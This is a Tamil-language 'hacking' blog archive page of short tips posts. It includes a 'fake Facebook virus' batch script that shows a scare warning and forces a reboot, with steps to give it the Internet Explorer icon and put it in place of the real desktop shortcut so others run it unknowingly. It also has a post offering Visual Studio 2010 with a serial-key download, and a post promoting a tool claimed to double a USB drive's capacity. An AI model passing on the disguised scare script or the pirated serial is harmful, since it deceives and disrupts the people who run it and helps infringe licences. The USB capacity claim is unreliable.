மார்ச் 2012 | HACKING ALL PRODUCT.
Recommend on Google

0 License Crawler.

உங்கள் கணணியில் பல்வேறான மென்பொருட்களை நிறுவி பயன்படுத்துவீர்கள். அதில் இலவச மற்றும் கட்டண மென்பொருட்களும் அடங்கும்.

கட்டணம் செலுத்தி வாங்கும் மென்பொருட்களுக்கு(Licensed softwares) வைத்திருப்பீர்கள். இந்த மாதிரி மென்பொருள்கள் வாங்கும் போது அதன் cd பெட்டியில் அந்த லைசென்ஸ் எண்கள் இருக்கும் அல்லது மின்னஞ்சல் மூலம் அந்த எண்கள் அனுப்பப்படும்.

நிறைய பேர் இந்த முக்கிய லைசென்ஸ் எண்களைத் தனியாக குறித்து வைத்திருக்க மாட்டார்கள். வைரஸ் காரணமாக கணணி செயலிழக்கும் போதோ அல்லது கணணியில் எதாவது பிரச்சினை ஏற்பட்டு அதனை பார்மேட்(Format) செய்யும் போது மறுபடியும் ஏற்கனவே இருந்த மென்பொருள்களை நிறுவ வேண்டியிருக்கும்.

அப்போது தான் மென்பொருள்களின் சீரியல் எண்(Serial No) எங்கே என்று தெரியாமல் தேட வேண்டிய சூழ்நிலை ஏற்படும். இதற்காக உதவக்கூடிய ஒரு இலவச மென்பொருள் தான் License Crawler.

இந்த மென்பொருளின் மூலம் உங்கள் கணணியில் நிறுவப்பட்டிருக்கும் கட்டண மென்பொருள்களின் லைசென்ஸ் எண்களை விநாடியில் கண்டறியலாம். பின்னர் இதனை எழுதி வைத்துக் கொள்ளலாம் அல்லது Text கோப்பாக சேமித்து வைத்துக் கொள்ளலாம்.

இந்த மென்பொருளை தரவிறக்கி License Crawler என்ற கோப்பைக் கிளிக் செய்யவும். இதில் Computer என்பதில் Localhost எனவும் அதற்கு கீழே HKEY_LOCAL_MACHINE என்று தெரிவு செய்து கொள்ளவும்.

பின்னர் Start Search என்பதைக் கிளிக் செய்தால் மென்பொருள்களின் பெயர் மற்றும் லைசென்ஸ் பெயர், எண்கள் பட்டியலிடப்படும். இதில் உங்கள் விண்டோஸ் உரிம எண், MS-Office போன்ற மென்பொருள்களின் லைசென்ஸ்களும் கிடைத்துவிடும். Save கொடுத்து ஒரு கோப்பில் எல்லாவற்றையும் சேமித்துக் கொள்ளலாம்.

எளிமையான இந்த மென்பொருள் கணணியில் நிறுவாமலே பயன்படுத்தலாம், பென்டிரைவில் வைத்தும் பயன்படுத்தலாம்.

இந்த மென்பொருளை பதிவிறக்க கீழே சொடுக்கவும்.



Password.    zxcvbnm


Please Write your comment.

0 how to make a downloder in vb 2010



1.          இப்படியாக ஒரு அட்டவணை தயாரிக்கவும்.

2.         அதில் 2 TextBox , 1ProgressBar , 1 Timer , 1SaveFileDialog , 3 Button , 4 Lable

3.         இதற்கான code களை கீழே பதிவிறக்கிக்கொள்ளலாம்.


உங்களுடைய கருத்துக்கள் எங்களை மீண்டும் உற்சாகப்படுத்தும். anyway



             Please Write your comment.

0 How to Download Microsoft Visual Studio 2010+Serial

                                                          


System requirements

Supported operating systems: Windows 7, Windows Server 2003 R2 (32-Bit x86), Windows Server 2003 R2 x64 editions, Windows Server 2003 Service Pack 2, Windows Server 2008 R2, Windows Server 2008 Service Pack 2, Windows Vista Service Pack 2, Windows XP Service Pack 3
    • Windows XP (x86) with Service Pack 3 - all editions except Starter Edition
    • Windows Vista (x86 & x64) with Service Pack 2 - all editions except Starter Edition
    • Windows 7 (x86 and x64)
    • Windows Server 2003 (x86 & x64) with Service Pack 2 - all editions
      • Users will need to install MSXML6 if not already present
    • Windows Server 2003 R2 (x86 and x64) - all editions
    • Windows Server 2008 (x86 and x64) with Service Pack 2 - all editions
    • Windows Server 2008 R2 (x64) - all editions
  • Supported Architectures:
    • 32-Bit (x86)
    • 64-Bit (x64) (WOW)
  • Hardware Requirements:
    • 1024 MB RAM (1.5 GB if running in a virtual machine)
    • 3 GB of available hard-disk space
    • 5400 RPM hard drive
    • DirectX 9 capable video card running at 1024 x 768 or higher-resolution display
    • DVD-ROM Drive


                                                  Download Visual Studio 2010

                                                  Download Serial

அடுத்து வரும் தொடர்களில் எப்படி மென்பொருல் தயாரிப்பது என்று பார்ப்போம்.



Please Write your comment.

0 How To Convert Text Into Audio Using Notepad.

Notepad ஐ ப்பயன்படுத்தி மிக எளிதாக எழுத்துக்களை எப்படி ஒலி யாக மாற்றுவது என்பதைப்பற்றி எந்த பதிவில் பார்ப்போம்.
                                                                                       முதலில்....................

1.    உங்கள் Notepad ஐ திறந்து இதை Type செய்யவும்

      Dim msg, sapi
msg=InputBox("Enter your text for conversion–hacking4200. blog spot.com.com","hacking4200 Text-To-Audio Converter")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg






2.      இதை your name.vbs  ஆக சேமிக்கவும்.




3.     இப்போது நீங்கள் பதிவு செய்த .vbs fileஐ திறந்து அதில் ஏதாவது type செய்து
        OK ஐ click செய்யவும்.








                                                              Please Write your comment.

0 How To Make Fake Facebook Virus.

நான் இப்போது இடப்போகும் இடுகைஎவ்வாறு சில கட்டளைகளைக்கொண்டு நமது Notepad ல் Facebook க்கான virus ஐ உருவாக்குவது என்பதை பற்றி.


1.Notepad ஐ திறந்து அதில்



@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE  VIRUS CLICK OK OR CLOSE THIS BOX!

PAUSE
shutdown -r -t 300 -c " SORRY!!! YOUR  FACEBOOK  ACCOUNT  ARE NOW BEING DELETED !!! PLEASE WAIT ..........."
என type செய்க.



2. அதை Internet Explorer .bat ஆக பதியவும்.




3.   Internet Explorer .bat இல் Right click செய்து Create Shortcut ஐ click செய்யவும்.




4.    உங்களது shortcut ல் Right click செய்து Properties ஐ click செய்யவும்.





5.     அதன் Icon ஐ மாற்றவும்.




6.     Internet Explorer, icon ஐ தெரிவுசெய்து click OK, click APPLY.





7.    உங்களது Desktop ல் உள்ள Internet explorer, Icon ஐ அழித்து விட்டு உங்கள் icon ஐ 
       Replace செய்யவும்.  இனி யாரவது Internet explorer ஐ திறந்தால் எப்படி ஒரு
       தகவல் வந்து உங்கள் கணணி அணைந்துவிடும்.






                                                  Please Write your comment.

8 How to Increase from 1GB USB TO 2GB.

நான் இணையத்தில் உலாவும் போது ஒரு அருமையான மென்பொருளை பார்வையிட்டேன். அது நமது 1GB USB ஐ 2GB ஆக அதிகரிக்ககூடிய ஒரு அருமையான மென்பொருள்.



ஆனாலும் இந்த மென்பொருளில் ஒரு குறைபாடு உள்ளது, இதைப்பயன்படுத்தி  உங்கள் USB ஐ 2GB அதிகரித்த பின் உங்கள் USB ஐ Format செய்தால் மறுபடியும் 1GB ஆக மாறிவிடும்.


இந்த மென்பொருளில் கணணிக்கு தீங்கிளைக்கூடிய எந்த வைரஸ் களும் இல்லை,

இது அளவில் மிகவும் சிறியது (105kb).

அனைத்து OS களுக்கும் இசைவானது.




                                                               Download USB From 1GB to 2GB


Please Write your comment.

Hello Friends இப்போது என்னிடம் தமிழில் 4 புத்தகங்கள் இருக்கின்றன. அவற்றை உங்களோடு பகிர்ந்து கொள்ள விரும்புகிறேன். அதில் உங்களுக்கு மிகவும் பயனளிக்க கூடியது எது என்பதை தெரிந்து வாக்களிக்கவும்.